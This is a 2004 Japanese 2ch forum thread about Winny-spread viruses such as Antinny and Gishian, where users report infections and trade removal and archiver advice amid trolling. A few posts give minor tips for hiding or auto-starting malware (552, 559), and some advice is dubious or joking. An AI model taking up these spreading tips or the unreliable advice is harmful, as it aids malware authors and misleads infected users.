        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄ ̄
                        |

445 :[名無し]さん(bin+cue).rar:04/08/16 19:17 ID:ke6Xm4uX
>>443
念のため確認だけど「書庫をダブルクリック」って
解凍したわけじゃないよな?

446 :[名無し]さん(bin+cue).rar:04/08/16 19:31 ID:lAjD3ZUJ
ぬるぽーす(~~)

447 :429:04/08/16 19:46 ID:FEBfSu0X
>>445
うん、explorerから開いただけでそれ以上は何も。

448 :[名無し]さん(bin+cue).rar:04/08/16 19:53 ID:P0wfog04
さっき何気にWクリックしようとしたaviが .exeだった。
1クリックめに気付いたけど俺の指にいった電気信号が
クリックを止める電気信号より早く細胞についちゃって、Wクリしちゃったかも
何も起きなかったけど、あの静寂が怖すぎる。

症状何も出てないから、とりあえずデスクトップに60GBほど移動しといた。
キンタマって晒す最大容量あるのかな。とりあえず飯食って寝る。

449 :[名無し]さん(bin+cue).rar:04/08/16 20:00 ID:KZJWJh9s
>>445
アーカイバの設定によってはWクリ即解凍で、フォルダまで開いたりする
.folder連携で速攻感染って場合も有る鴨ね

つかageんなよ

450 :[名無し]さん(bin+cue).rar:04/08/16 20:43 ID:o2ZgYXQ3
ノートンの定義ファイル更新きた

451 :429:04/08/16 20:53 ID:FEBfSu0X
シマンテックに提出すべきだったかなぁ、、、(´・ω・`)

452 :[名無し]さん(bin+cue).rar:04/08/16 21:00 ID:M+qRRFxb
念のためしておいたら?
亜種かもしれないし

453 :[名無し]さん(bin+cue).rar:04/08/16 21:01 ID:c3omb9gb
>>431
VBのモジュールだかフォームだかの名称がGishianなんだよ。


>>450
Mydoom.Qがキタから。


454 :[名無し]さん(bin+cue).rar:04/08/16 21:08 ID:XvNpTf/f
>>451
まだファイル残ってるなら送っておいてくれ。
>>428の記事を読む限り、
どうやら同じvirusでもより多くの人間が同時に提出しないとベンダーでの対応が遅くなるようだから、
ノートン未反応でそれらしいファイルがあればガンガン送っていいと思う。
対応を催促する意味でも。

455 :[名無し]さん(bin+cue).rar:04/08/16 21:13 ID:O+WR8j9W
やっぱりウイルス名はgishianになるのだろうか?

456 :[名無し]さん(bin+cue).rar:04/08/16 21:15 ID:Gj9z2qoO
スタートアップに登録されてHDDあぼーんのやしなんてマジであったの?

457 :[名無し]さん(bin+cue).rar:04/08/16 21:18 ID:ke6Xm4uX
>>449
ゴメーン (´・ω・`)ショボーン

458 :429:04/08/16 21:18 ID:FEBfSu0X
もう消しちったスマソ


459 :[名無し]さん(bin+cue).rar:04/08/16 21:20 ID:M+qRRFxb
nyのキャッシュからまた変換してみたら?

460 :[名無し]さん(bin+cue).rar:04/08/16 22:03 ID:n5hggVrk
最近このスレ、感染者も答えてる人もほとんど同レベルだ
感染者、過去の感染者の集いって感じ

知識のある人はあまりの夏厨の勢いに逃げたか。


461 :[名無し]さん(bin+cue).rar:04/08/16 22:12 ID:YvIa1Nw/
ただ回答するのもめんどくさいだけ

462 :[名無し]さん(bin+cue).rar:04/08/16 22:12 ID:XvNpTf/f
答える必要のある質問が無いだけ。

463 :[名無し]さん(bin+cue).rar:04/08/16 22:13 ID:V4z/LdPe
>>460・・・と、ウィルスに感染して涙目になりながら必死な厨が申しております

464 :[名無し]さん(bin+cue).rar:04/08/16 22:13 ID:DtLbbf5+
既出の話題は遠慮なくスルー

465 :[名無し]さん(bin+cue).rar:04/08/16 22:16 ID:LMmwGdyB
感染しないからなあ

466 :[名無し]さん(bin+cue).rar:04/08/16 22:19 ID:jpirEoKy
キンタマ以上に、もっとホネのあるヤツをみてみたい。
そんなのに感染したら教えてくれ

キンタマの詰め合わせをnyじゃなくて、メルアドに流すような
本気で人生終わりになるようなのないのかなぁ?

467 :[名無し]さん(bin+cue).rar:04/08/16 22:25 ID:GEtwAmyU
>>466
京都府警に(ry


((;゚Д゚)

468 :[名無し]さん(bin+cue).rar:04/08/16 22:28 ID:V4z/LdPe
ニュー速あたりに
「○○に爆弾仕掛けますた」と言うような、
所謂犯行予告を書き込むウィルスがあったら、本気で人生終わるだろうなぁ・・・

469 :[名無し]さん(bin+cue).rar:04/08/16 22:46 ID:XvNpTf/f
>>468
virusによる仕業であれば不可抗力として法的責任を免れるから立件不能。
2chに少し負荷がかかる程度のものだ。

470 :[名無し]さん(bin+cue).rar:04/08/16 23:05 ID:fQN+bwy+
どうやったらウイルスなんて感染するのかね。
もう感染したなら黙ってリカバリでもしてろと、たいがいテンプレ見たら解決できるしえらい迷惑





と、テンプレ理解できずに3回リカバリした私が生意気言ってみるにゃあ

471 :[名無し]さん(bin+cue).rar:04/08/16 23:06 ID:M+qRRFxb
HDとマザーボード熱暴走させて家燃やすようなウィルスなら人生終わらせられるかも

472 :[名無し]さん(bin+cue).rar:04/08/16 23:06 ID:DtLbbf5+
exe実行しなくても感染するウィルス来ないかなぁ。。。

473 :[名無し]さん(bin+cue).rar:04/08/16 23:12 ID:YvIa1Nw/
こんだけ引っかかってくれたら作るほうもつくりがいあるよな
気持ちわかるわ

474 :[名無し]さん(bin+cue).rar:04/08/16 23:17 ID:lsLehemo
うっかり八兵衛が入れ食いだからな

475 :[名無し]さん(bin+cue).rar:04/08/16 23:17 ID:s9KAt351
運がいいのかちっとも感染しないからなぁ
基本知識はあるつもりだが、これ以上詳しくなるには
本でも買って勉強するしかねーんだろうな

476 :[名無し]さん(bin+cue).rar:04/08/16 23:21 ID:M+qRRFxb
一つ聞きたいのだが
ウィルスに感染してない奴がなんでこのスレ見てるんだ?
助けてやろうという親切心から?
感染している奴を蔑みたいから?
次作るウィルスの参考にしたいから?

477 :[名無し]さん(bin+cue).rar:04/08/16 23:22 ID:y7RKXLmu
ウィルスに感染しないために決まってんじゃん

478 :[名無し]さん(bin+cue).rar:04/08/16 23:23 ID:/d2c8jKR
予防対策だろ?
敵を知り己を知ればなんとかって言うじゃん。

479 :[名無し]さん(bin+cue).rar:04/08/16 23:25 ID:M+qRRFxb
なるほど
我に返るほど納得した
世の中用心深い奴もいるもんだね(褒め言葉)

480 :[名無し]さん(bin+cue).rar:04/08/16 23:26 ID:WZOLI3Go
多分ここにいるやつら一度ぬるぽあたりに感染したんだと

481 :[名無し]さん(bin+cue).rar:04/08/16 23:29 ID:RNQ0wm4Q
>>476
感染してからじゃ遅いって
ny独自のに限らず、流行のウィルス情報は普通チェックするだろ
nyは独自で他じゃ情報つかめないからここ見てるだけで

482 :[名無し]さん(bin+cue).rar:04/08/16 23:31 ID:V4z/LdPe
>>477
禿げ上がるほど胴衣

483 :[名無し]さん(bin+cue).rar:04/08/16 23:41 ID:RyKXm90X
キンタマ感染してからモニターの調子が悪いんだけど。


484 :[名無し]さん(bin+cue).rar:04/08/16 23:54 ID:beY3qlZb
世界の中心でうっかり八兵衛と叫ぶ

485 :[名無し]さん(bin+cue).rar:04/08/17 00:02 ID:/oV9Czxr
ID:M+qRRFxb

486 :[名無し]さん(bin+cue).rar:04/08/17 00:06 ID:6gTgCaPK
初めてのキンタマ感染記念パピコ☆

487 :[名無し]さん(bin+cue).rar:04/08/17 00:13 ID:DvfyXLyp
キンタマあったけどノートン先生がさっさと駆除しちゃった。
(´;ω;`)ツマンナイ…

488 :[名無し]さん(bin+cue).rar:04/08/17 00:15 ID:rQ2w2sSp
そんなあなたにデスノート。

489 :[名無し]さん(bin+cue).rar:04/08/17 00:17 ID:9I7BhZAG
>>487
保存用フォルダを先生から除外しとけ
でなかったら.gca辺りにでも圧縮しとけ

490 :[名無し]さん(bin+cue).rar:04/08/17 00:19 ID:FMk1gmHj
【アルバム】The Beatles - Black Album(2枚組)ってやつの中に
417,429 バイトjpegを偽装したファイルがあって
実行してしまいました。
これはなんのexeファイルですか?
知っている方がいたら教えてください。

491 :[名無し]さん(bin+cue).rar:04/08/17 00:21 ID:3fDCpkpU
>>490
うp

492 :[名無し]さん(bin+cue).rar:04/08/17 00:23 ID:9MHWPiop
>>490
トロイ

493 :[名無し]さん(bin+cue).rar:04/08/17 00:24 ID:FMk1gmHj
うpしていいもんなのかな?

494 :[名無し]さん(bin+cue).rar:04/08/17 00:25 ID:FMk1gmHj
>>492
発動すると、どうなりますか?
また、どうすれば解除できますか?


495 :[名無し]さん(bin+cue).rar:04/08/17 00:34 ID:4/VPyAJ0
つうかThe Beatles - Black Albumなんてものがあったら
歴史的大発見じゃないか?

496 :[名無し]さん(bin+cue).rar:04/08/17 00:35 ID:8woYcvQa
>>492
それだけの情報でわかる訳ないだろ(゚Д゚)ゴルァ!!

497 :[名無し]さん(bin+cue).rar:04/08/17 00:40 ID:FMk1gmHj
>>495
そうなんすけどね。
>>496
どんな情報があればわかりますか?
これといった症状とかはありませんし
ウィルスバスターにもひっかかってません。

498 :[名無し]さん(bin+cue).rar:04/08/17 00:41 ID:zS5Lvbji
>>444
症状がなきゃ放置
一回再起動してみ
それでも無ければたぶん大丈夫

499 :[名無し]さん(bin+cue).rar:04/08/17 00:41 ID:XazF9ch2
>>3


500 :[名無し]さん(bin+cue).rar:04/08/17 00:44 ID:FMk1gmHj
>>498
再起動はしてみましたが何もありませんでした。
このままなにもなければいいですが。

501 :[名無し]さん(bin+cue).rar:04/08/17 00:54 ID:4/VPyAJ0
>一回再起動してみ
>それでも無ければたぶん大丈夫
何気に恐ろしいこと書きますね。

502 :[名無し]さん(bin+cue).rar:04/08/17 00:56 ID:UGxHylvU
なんだかヤバイぞ。
winny2置いてあるフォルダと別の場所upフォルダができてやがった。

503 :[名無し]さん(bin+cue).rar:04/08/17 00:59 ID:drvwjKVc
wiNNYフォルダに[UpFolder.txt]がないのですが、
このファイルがないということは
キンタマには感染していないということですか?

504 :[名無し]さん(bin+cue).rar:04/08/17 01:00 ID:wGGzmOgl
502
キンタマ

505 :490:04/08/17 01:17 ID:FMk1gmHj
downフォルダにはいってたファイル名で
upフォルダに変な男の画像ファイルができてます。。。
これなんですか?

506 :[名無し]さん(bin+cue).rar:04/08/17 01:23 ID:Pl+ysSnC
思いっきりぬるぽワームだなw

507 :[名無し]さん(bin+cue).rar:04/08/17 01:25 ID:8woYcvQa
>>505
おまえ完璧に感染してんじゃん(・∀・)

>>498
あとおまえアホか?
490は完璧にexe踏んだって書いてんだから
再起動なんかさせたらあぶねぇだろが(゚Д゚)ゴルァ!!



508 :[名無し]さん(bin+cue).rar:04/08/17 01:27 ID:lMf4kxa9
>>507
アホもなにもただの釣りだろ

キンタマやるぬぽはもうこなれてるから感染報告はイラネ


509 :490:04/08/17 01:28 ID:FMk1gmHj
そうっすかぁ。
なんとか対処してみます、、、

510 :503:04/08/17 01:32 ID:drvwjKVc
すごく厨房な質問なんですが>>503はどうなんでしょうか。
感染はしてないということになりますか?
レスおながいします、

511 :[名無し]さん(bin+cue).rar:04/08/17 01:34 ID:LMl89ZWh
マルチuzee

512 :[名無し]さん(bin+cue).rar:04/08/17 01:41 ID:UGxHylvU
ボクは、upfolder.txtが0バイトで何も書かれていない状態かつ
レジストリエディタは普通、ユーザ名.txtも存在していないうえにupフォルダが存在しなかった。
それでも起動時にwinny関連のウイルスがネットにアクセスしていたぞ。

513 :[名無し]さん(bin+cue).rar:04/08/17 01:42 ID:Pl+ysSnC
>>510
レス

514 :[名無し]さん(bin+cue).rar:04/08/17 01:57 ID:4/VPyAJ0
>>597はほかの人のレスを読んでふいんき(←なぜか変換できない)
だけで書き込んでるような気がする。

515 :514:04/08/17 01:58 ID:4/VPyAJ0
>>507

516 :[名無し]さん(bin+cue).rar:04/08/17 02:30 ID:89raJwST
それにしてもスパイウェアが一杯入ってくるなー
わかっててもやっちゃうんけど・・・。
もうちょっと危機感もったほうがいいのかなやっぱり

517 :[名無し]さん(bin+cue).rar:04/08/17 02:34 ID:rQ2w2sSp
Spybotで免疫つけておけって。

518 :[名無し]さん(bin+cue).rar:04/08/17 03:00 ID:89raJwST
今落としている最中です。
なにやら便利そうですね。
ありがとうございます

519 :[名無し]さん(bin+cue).rar:04/08/17 03:42 ID:WlB9FXqW
これってのはfolderとか実行しなきゃいいだけだよな?
今んとこひっかかってねぇけど。
AVGとか色々突っ込んであるから今んとこは大丈夫だが。

520 :[名無し]さん(bin+cue).rar:04/08/17 03:51 ID:zkfUjc5W
しかし、>>498は凄いアドバイスだなw
ウイルスばら撒いている関係者か?

521 :[名無し]さん(bin+cue).rar:04/08/17 04:06 ID:EayPVDDF
ダミーwinnyインスコは効果あるのか?
試しにキンタマ起動したらダミーの方に感染してた
本nyとは別だからCドライブへの被害さえ抑えれば
晒しあげされることも無いんじゃないだろか

522 :[名無し]さん(bin+cue).rar:04/08/17 04:15 ID:c70k3AB4
>>498はネタだろ

523 :[名無し]さん(bin+cue).rar:04/08/17 04:29 ID:GH482zmW
>>519
古い解凍ツールとか使って解凍するとスタートアップにファイルが解凍されるので次回起動時に…。

524 :[名無し]さん(bin+cue).rar:04/08/17 04:34 ID:fBF22jcu
WinRARを使っていれば、そんな心配もいらないわけだが

525 :[名無し]さん(bin+cue).rar:04/08/17 04:36 ID:nMP80GBc
>>524
WinRARって試用期間過ぎても使える?

526 :[名無し]さん(bin+cue).rar:04/08/17 04:52 ID:inkbvNy7
>>525
本家

527 :[名無し]さん(bin+cue).rar:04/08/17 04:53 ID:inkbvNy7
>>525
本家じゃなくてもDLLいれて、フリーのソフトでもいいじゃん
ミスって途中送信しちゃったよOTZ


528 :[名無し]さん(bin+cue).rar:04/08/17 06:11 ID:9I7BhZAG
>>527
unrar.dllやunrar32.dllだけじゃ.lzhの脆弱性には対処できねーんじゃね?
よー知らんけど

ま、フリーのアーカイバも続々対応してるらしいから、
とっととVer.UPしとけって事だな

529 :[名無し]さん(bin+cue).rar:04/08/17 11:53 ID:ll6qAGOT
なぜWinRARだと大丈夫なんですか?

530 :[名無し]さん(bin+cue).rar:04/08/17 12:05 ID:RvUQcZ3S
>>529
以前はWinrarだと脆弱性が発生しなかったというだけ。
今はフリーのアーカイバでも最新版入れてれば対応済みだから問題無し。

531 :[名無し]さん(bin+cue).rar:04/08/17 12:31 ID:KAi+r/E3
>>495
ホワイトアルバムの海賊版でブラックアルバムってのがあったんだよに。

532 :[名無し]さん(bin+cue).rar:04/08/17 12:39 ID:VQ4TV7nI
>>529
WinRARは中身を覗ける&中のファイルを個別に削除から。
>>530は例の脆弱性の話に限定しすぎ。
7月にその話が出てWinRARがより推奨されたが、
それ以前からWinRARは推奨されてました。

533 :[名無し]さん(bin+cue).rar:04/08/17 12:52 ID:hwaUqu9z
昨日一晩で落としたものをノートンでスキャンしてみた
antinny
antinny.k
antinny.g
w32.pinfi
trojan dropper
backdoor.trojan 

計93個あった
半年前じゃ考えられない数だな


534 :[名無し]さん(bin+cue).rar:04/08/17 13:08 ID:iIcm2LvT
あれだよ。京都○警が手当り次第にウイルス添付して放流しty=ー( ゚д゚)・∵. ターン

535 :[名無し]さん(bin+cue).rar:04/08/17 13:11 ID:5Zk7kkHv
一晩でいくらおとしてるんだ、というのはおいといて

ANTINNYは当然として
>trojan dropper
>backdoor.trojan 

これは確か汎用名だよな?
なんかの亜種をノートンがそう判別してるのか?
ただ普通の自分のもってる感染したファイルを一緒に圧縮して流して喜んでるのがいるのか?

536 :[名無し]さん(bin+cue).rar:04/08/17 14:22 ID:bEOXuo0p
一昔前は、ウイルスチェッカの検証用に、ウイルスやらワームを収集しようと思っても
なかなか集まらなかったものだが……。nyに流れてるのを集めだしてからコレクションが増えた。

それでもメール添付型のBugbearとかnetsky系は、nyにはあまり流れてないから、やはり気付かないうちに感染してる
ってのが多いんじゃないかなぁ。ちなみにノートン先生だと汎用名は_genが付いてるよ

537 :533:04/08/17 14:47 ID:hwaUqu9z
トレンドマイクロのオンラインスキャンだと
backdo(ry はantinny.cだったよ


538 :[名無し]さん(bin+cue).rar:04/08/17 14:53 ID:x3ZQL3Ok
>>514
ふいんきじゃなくて
ふんいきで変換→雰囲気

539 :[名無し]さん(bin+cue).rar:04/08/17 14:54 ID:CvX+mwpa
>>538 ネタにマジレス( ・∀・ )ノカコワルイ

540 :[名無し]さん(bin+cue).rar:04/08/17 15:04 ID:4xXuTevP
>>537
thx
とりあえず亜種もtrojanとして判別するようにはなったのかー

541 :[名無し]さん(bin+cue).rar:04/08/17 15:06 ID:RvUQcZ3S
>>532
イマドキ中身を覗けるアーカイバなんていくらでもある。
そもそも今回の件は脆弱性でもなんでもない、単に相対パス指定で圧縮出来る仕様を利用しただけだろ。
lhaの作者だって「仕様だから対応しない。各ソフトで勝手にすれ」と明言してるしな。
たまたま元からその仕様を無視してたWinRARでは被害が発生しなかったというだけだ。

だいたいがWinRARの開発初期から見てきてる人間からしたら、
開発者が余計な機能をつけることばかりに夢中で安全性の意識が足りないんだよ。
3.10以前には任意のバイナリコードが実行可能なセキュリティホールがあるし
3.20以前にはリモートでDoS攻撃可能なセキュリティホールがあるし
今のVerだって何が起こるか解らんから極力使わんようにしてる。

WinRAR信者はそういう黒歴史を無視して推奨推奨と喚くから嫌なんだ。
リカバリレコードを始めとした各機能が非常に優秀であることは間違いないが、
セキュリティ面では無条件に人に薦められるような経緯は辿ってないだろ、と。

542 :[名無し]さん(bin+cue).rar:04/08/17 15:26 ID:LvQ0vL9b
>>530
>>532
RarUty ver1.69gを使っているのですが
これだとだめですか?

543 :[名無し]さん(bin+cue).rar:04/08/17 15:36 ID:wFPXnI6m
>542
変えたほうがいい

544 :[名無し]さん(bin+cue).rar:04/08/17 15:50 ID:9I7BhZAG
らるちは開発終了物件だろ
脆弱性込みで使うか別物に乗り換えるかだな

オイラは乗り換えを推奨

545 :[名無し]さん(bin+cue).rar:04/08/17 15:50 ID:VQ4TV7nI
>>541
君の知識は分かったからさ、
>>529への質問に対しての答えが足りないじゃないから>>532で補足しただけ。

あくまでもこのスレでWinRARが推奨されてたのは前述した
「中身を覗ける&中のファイルを個別に削除」がメイン。
昔から>>7のテンプレにも書いてあるだろ?
例の脆弱性の問題しか触れてないので付け加えただけ。


546 :[名無し]さん(bin+cue).rar:04/08/17 15:52 ID:QdMVTVjR
すげっ、久々にwinny繋げてファイル落としたら
win32pinfi
antinny
trojan dropper
と3つ入ってた
世知辛い世の中になりました


547 :538:04/08/17 16:43 ID:x3ZQL3Ok
なんで漏れだけ叩かれる・・・(´・ω・`)ショボーン

548 :[名無し]さん(bin+cue).rar:04/08/17 16:49 ID:dynmD4XP
>>547
( ´∀`)σ)∀`)

549 :[名無し]さん(bin+cue).rar:04/08/17 16:55 ID:iIcm2LvT
>>547
おまいさんが知らないだけで、ガイドラインがあるんだよ。

550 :[名無し]さん(bin+cue).rar:04/08/17 17:06 ID:AlaXXdHb
>>547
ニヤニヤ

551 :[名無し]さん(bin+cue).rar:04/08/17 17:11 ID:LvQ0vL9b
>>543
>>544
ありがとうございます、変更します。

552 :[名無し]さん(bin+cue).rar:04/08/17 19:21 ID:RAQIYoaA
ウィルス流してる奴へ


exeとかフォルダとか隠し属性付きにしとくといいぞ!!
隠しファイル表示無しにしてるヤツら全滅w

553 :[名無し]さん(bin+cue).rar:04/08/17 19:29 ID:XyB8g/FK
>>552
バカ?

554 :[名無し]さん(bin+cue).rar:04/08/17 19:48 ID:4OoH0EoD
>>553
今日初めてそんな属性があるんだって気付いたんだよ、きっと。

555 :[名無し]さん(bin+cue).rar:04/08/17 19:57 ID:LqYCAZb2
こんなウィルスかかるやつみんなバカだろw
得体の知れない圧縮ファイルの中身も確認しないで解凍して
出てきた得体の知れない物ダヴォークリッコして実行しちゃうw

556 :[名無し]さん(bin+cue).rar:04/08/17 20:02 ID:pH0T8M8o
表示なしにしたらどうやって実行するんだ?
スタートアップだけか

557 :[名無し]さん(bin+cue).rar:04/08/17 20:05 ID:8AQVrQo+
隠し属性にしちゃったら誰もクリッコしないからダメじゃんなw

558 :[名無し]さん(bin+cue).rar:04/08/17 20:13 ID:a7TaR23p
ここは笑いあり涙ありのインターネットですね

559 :[名無し]さん(bin+cue).rar:04/08/17 20:14 ID:XazF9ch2
スタートアップに突っ込めばいい

560 :[名無し]さん(bin+cue).rar:04/08/17 20:24 ID:vrqUvQbR
昨夜、ny起動したまま眠りに着いたんですよ。
そして朝、目を覚ましてみると見慣れない画面が出ていまして、

黒い画面に白文字でwindowsのsystemが見当たらない、壊れているとか表示されてるわけで・・・

一体、睡眠中に何があったんだぁ。・゚・(ノД`)・゚・。

561 :[名無し]さん(bin+cue).rar:04/08/17 20:27 ID:mLieoJsr
Winnyそのものがウィルスなんだよ

562 :[名無し]さん(bin+cue).rar:04/08/17 20:31 ID:FTysvAvJ
winny起動だけでウィルス感染したりすることは無いんでしょうか。
ファイルのみの問題なんですか?

563 :[名無し]さん(bin+cue).rar:04/08/17 20:47 ID:lf5NDHWj
なんか無法地帯だな

564 :[名無し]さん(bin+cue).rar:04/08/17 20:48 ID:2RG53zso
Winnyで落としたファイルを実行→ウィルス感染

565 :[名無し]さん(bin+cue).rar:04/08/17 20:52 ID:XazF9ch2
まだ見つかってないセキュリティホールがあれば起動してるだけで感染する可能性もある

566 :[名無し]さん(bin+cue).rar:04/08/17 20:54 ID:Buussoe3
>>560
キンタマ亜種じゃないの?
確かDLLを破壊してWindowsを起動不可能にするし

567 :[名無し]さん(bin+cue).rar:04/08/17 21:05 ID:hOXW6Ers
OS→Windows XP
バージョン→vr2.0b7
nyを起動すると、今までDLしていたファイルが0に戻ってしまい、「Cache」フォルダ内を見ると
1KBファイルが大量発生しています。
これは、何かに感染してしまってるのでしょうか?
先程ウィルスバスターで感染の状況を調べると、DLしたこともないファイルが100個近くもあることが分かり、すべてウイルスでした・・。
どうすれば元にもどるのでしょうか・・。
どうかよろしくお願いします。


568 :[名無し]さん(bin+cue).rar:04/08/17 21:09 ID:9I7BhZAG
質問テンプレ端折った上にage厨で全角厨か

答える義理もなければ気力も湧かんな

569 :[名無し]さん(bin+cue).rar:04/08/17 21:19 ID:P5KHRySW
delexeを使ったら
zip diagnostic: including 2/a02.exe
deleting: 2/a02.exe
total bytes=128, compressed=128 -> 0% savings

こんなんでました。
ウイルス?

570 :[名無し]さん(bin+cue).rar:04/08/17 21:28 ID:xZrd58kx
>>567
ウイルスだな。
クリーンインスコだな。

571 :sage:04/08/17 21:31 ID:hOXW6Ers
>>570
クリーンインスコって何ですか??
対処法はどうすればいいのでしょうか?

572 :[名無し]さん(bin+cue).rar:04/08/17 21:33 ID:xZrd58kx
>>571
Cドライブフォーマットして、OS入れ直し、以上!

573 :[名無し]さん(bin+cue).rar:04/08/17 21:34 ID:xZrd58kx
>>571
あとsageは半角でメール欄だ。
半角ってわかってるか?

574 :[名無し]さん(bin+cue).rar:04/08/17 21:35 ID:XoCzsY/5
釣られるなよ

575 :[名無し]さん(bin+cue).rar:04/08/17 21:35 ID:hOXW6Ers
すいません、それって全部消えるってことですよね?
他には無いのでしょうか・・?

576 :[名無し]さん(bin+cue).rar:04/08/17 21:37 ID:xZrd58kx
無いな、度素人には他の方法はない。
つうか、度素人がnyやるな。
今回は授業料だと思っとけ。
>>574
ああ、すまんな。

577 :[名無し]さん(bin+cue).rar:04/08/17 21:39 ID:OX/AAV6W
ヌルポ

578 :[名無し]さん(bin+cue).rar:04/08/17 21:40 ID:a7TaR23p
ここはガッなインターネットですね

579 :[名無し]さん(bin+cue).rar:04/08/17 21:53 ID:AlaXXdHb
>>575
残念だけどOS入れ直すしかないよ

580 :[名無し]さん(bin+cue).rar:04/08/17 22:06 ID:n9hPxv7C
結構亜種増えているな。
確実に防ぐ手は無いのか。
>>581それをいったら元も子もない

581 :[名無し]さん(bin+cue).rar:04/08/17 22:08 ID:xZrd58kx
Winnyするな

582 :[名無し]さん(bin+cue).rar:04/08/17 22:20 ID:8D1sG5kM
>>580
最近出た新種・亜種も、テンプレの注意事項を常にやっておけば、防げたんじゃないかなぁ。

つか>>581との連携のよさはなに?

583 :[名無し]さん(bin+cue).rar:04/08/17 22:20 ID:DvfyXLyp
>>580-581ヽ(´ー`)ノ仲良きことは美しき哉

584 :[名無し]さん(bin+cue).rar:04/08/17 22:29 ID:gk6iMs26
>>581
このスレで噴出すことになるとは思わなかったw

585 :[名無し]さん(bin+cue).rar:04/08/17 22:31 ID:3fDCpkpU
パソコンを窓から(ry

586 :[名無し]さん(bin+cue).rar:04/08/17 22:36 ID:bEOXuo0p
MBRに感染するウイルスだったら、フォーマットしても無駄。


587 :[名無し]さん(bin+cue).rar:04/08/17 22:44 ID:4OoH0EoD
>>586
ttp://www.sophos.co.jp/support/disinfection/mbrnvir.html
http://www.ipa.go.jp/security/antivirus/repair.html

588 :[名無し]さん(bin+cue).rar:04/08/17 23:16 ID:CvX+mwpa
>>569 nyで圧縮ファイル内にあるexeなどはほぼウィルスと思って間違いない
    運がよければジョークプログラムとか 

589 :[名無し]さん(bin+cue).rar:04/08/17 23:46 ID:QdMVTVjR
ゲインまじでうざー

590 :[名無し]さん(bin+cue).rar:04/08/18 00:33 ID:Sdyr7LG5
ついギシアン実行してもうた・・・感染元:ネタバレデスノート

exeが関連付けされる>exe実行するとまたギシアン
プログラムファイルの中身をお掃除してくれた
Winnyフォルダの本体以外とDown・キャッシュ両方ともお掃除
Documents and Settings/Administratorが無くなった
タスクマネージャ本体もギシアンに変わってた(ここが本体とは言い切れないが・・・)


とりあえずw2k環境なんで、CD起動>修復でexeがギシアンからは開放されるが
どこの何がギシアンに変えられているか不明・・・
面倒なんで再インスコした

591 :[名無し]さん(bin+cue).rar:04/08/18 00:40 ID:PA0wSJlp
ちょっとした質問ですが、
nyで落としたアニメを見ようとダブルクリックしたら、PCが
いきなり再起動して、HDDが動いたままとまらなくなりました。
 ですが、その動画は今は普通に見れるし、以前も確認できました。
後から、msconfigでスタートアップを確認したら、新しく「dumprep 0-k
というものが出てきました。
 動画を再生しただけでウイルス感染ってありますか?

592 :[名無し]さん(bin+cue).rar:04/08/18 00:43 ID:oZ5r8TZv
ググるくらいしろ
エr

つりっぽいからやーめた

593 :[名無し]さん(bin+cue).rar:04/08/18 00:46 ID:PA0wSJlp
>>592
dumprepについてはちょっとぐぐってみました。
エラーが出たときの報告のためのシステムらしいですが。
再生しようとしたらPCが落ちたファイルはaviです。
ウイルスによる症状なんでしょうか?

594 :[名無し]さん(bin+cue).rar:04/08/18 00:48 ID:+BXF3329
>>593
うんうん、それウイルス。
クリーンインスコしないと個人情報だだ漏れ

595 :[名無し]さん(bin+cue).rar:04/08/18 00:58 ID:HyFY/Y7w
>>593
亜種だな。リカバリしろ。

596 :[名無し]さん(bin+cue).rar:04/08/18 01:00 ID:cd3G1qKS
偽装avi

597 :[名無し]さん(bin+cue).rar:04/08/18 01:32 ID:8+9tdBzV
>>591

その前に何かを踏んでたんじゃない?


598 :[名無し]さん(bin+cue).rar:04/08/18 01:39 ID:U3I83Vpv
早くリカバリしないと大変なことに…

599 :[名無し]さん(bin+cue).rar:04/08/18 01:46 ID:oZ5r8TZv
リカバリ前にノートン回せよ
かかったら
外付け抜く→LAN線抜く→ノートン回す→出てきたウイルス情報を参考にして修復
→元通り( ´∀`)→と思ったらまだ治ってない→だだ漏れ→人生終わり

600 :[名無し]さん(bin+cue).rar:04/08/18 02:15 ID:LkmrrEpp
(((( ;゚Д゚)))ガクガクブルブル

601 :sin:04/08/18 02:52 ID:6Q7F+fqS
感染したファイルに、
ライトプロテクトがかかってまして、
駆除も削除も、隔離すら出来ないのですが、
どうすれば宜しいでしょうか?
皆様方のご指導お願いしまつ

orz


602 :[名無し]さん(bin+cue).rar:04/08/18 02:56 ID:z462QnvX
>>601
自分の頭かパソコン本体のいずれかをハンマーでぶったたけばいいと思います。

603 :[名無し]さん(bin+cue).rar:04/08/18 03:19 ID:5uman++3
糞つまんねーレスばっかしてんじゃねー
廃人どもが

604 ::04/08/18 03:24 ID:z462QnvX
とウィルスに感染した真性廃人が申しております。

605 ::04/08/18 03:30 ID:gz5ZeYVr
IDが傲慢だしな
(・∀・)ニヤニヤ

606 ::04/08/18 03:52 ID:fHkzS0mF
うかうか感染する香具師の事なんか、知ったこっちゃねーしな

607 :[名無し]さん(bin+cue).rar:04/08/18 04:10 ID:5uman++3
感染なんて一度もしたことねーよ!
てめーらのレスが糞過ぎるんだよ

608 :[名無し]さん(bin+cue).rar:04/08/18 04:13 ID:sCDpB5z0
だな
あんまりアホなことやってると、必要な感染情報も集まらなくなるよ
ほどほどにな

609 :[名無し]さん(bin+cue).rar:04/08/18 04:19 ID:W6E4auES
つか、個人情報ってそんなに漏れる物なんか

610 :[名無し]さん(bin+cue).rar:04/08/18 04:19 ID:KI07lEX9
一番のアホは>>603だと思うがw

611 :[名無し]さん(bin+cue).rar:04/08/18 04:31 ID:5uman++3
>>602のレスなんて寒すぎる
糞でアホだろが
どんな脳みそしてんだ


612 :[名無し]さん(bin+cue).rar:04/08/18 04:36 ID:z01EtXbA
>>611
同意

613 :[名無し]さん(bin+cue).rar:04/08/18 04:38 ID:uh2f5CPk
あんたも少し落ち着け ID:ゴウマン++サン

614 :[名無し]さん(bin+cue).rar:04/08/18 04:53 ID:z462QnvX
ID:5uman++3
何を必死になってんだか(´゚c_,゚` )プッ
ウィルスに引っかかって大変なのはわかったから落ち着けと

615 :[名無し]さん(bin+cue).rar:04/08/18 04:56 ID:wbtJYKGr
602 :[名無し]さん(bin+cue).rar :04/08/18 02:56 ID:z462QnvX
>>601
自分の頭かパソコン本体のいずれかをハンマーでぶったたけばいいと思います。

604 :↑ :04/08/18 03:24 ID:z462QnvX
とウィルスに感染した真性廃人が申しております。

614 :[名無し]さん(bin+cue).rar :04/08/18 04:53 ID:z462QnvX
ID:5uman++3
何を必死になってんだか(´゚c_,゚` )プッ
ウィルスに引っかかって大変なのはわかったから落ち着けと

616 ::04/08/18 05:00 ID:z462QnvX

(´c_,` )

617 :[名無し]さん(bin+cue).rar:04/08/18 05:16 ID:z01EtXbA
z462QnvX
